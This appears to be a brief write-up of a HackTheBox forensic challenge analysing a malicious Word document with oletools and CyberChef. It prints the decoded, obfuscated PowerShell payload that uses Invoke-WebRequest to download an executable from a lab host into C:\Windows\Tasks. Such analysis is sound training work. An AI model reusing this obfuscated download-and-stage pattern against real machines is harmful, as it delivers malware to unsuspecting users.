Microsoft Office Word Document Malware Analysis | HackTheBox Diagnostic
We covered analyzing a sample Microsoft office word document using oletools to extract relevant Macros and links. The sample document…
We covered analyzing a sample Microsoft office word document using oletools to extract relevant Macros and links. The sample document contaiend a link that references a webpage containg a Javascript code. The JS code contained a base64 encoded Powershell command that does a callout to an external domain to retrieve an executable file. This was part of HackTheBox Diagnostic forensic challenge.. This was part of HackTheBox Diagnostic. This was part of HackTheBox Diagnostic.
Video Highlights
- We used oleid and oleobj to analyze the word document named layoff.doc
- The document contaiend an external link which references a webpage that contaiend a Javascript
- We used the ASCII table to convert the char[58] and char[34] into their correspnding ASCII.
- We then used Cyberchef to convert the base64 and it converted to the below
${f`ile} = (“{7}{1}{6}{8}{5}{3}{2}{4}{0}”-f’}.exe’,’B{msDt_4s_A_pr0′,’E’,’r…s’,’3Ms_b4D’,’l3′,’toC’,’HT’,’0l_h4nD’)
&(“{1}{2}{0}{3}”-f’ues’,’Invoke’,’-WebReq’,’t’) (“{2}{8}{0}{4}{6}{5}{3}{1}{7}”-f ‘://au’,’.htb/2′,’h’,’ic’,’to’,’agnost’,’mation.di’,’/n.exe’,’ttps’) -OutFile “C:\Windows\Tasks\$file”
- We used powershell to decode the above into the challenge flag
Video Walkthrough
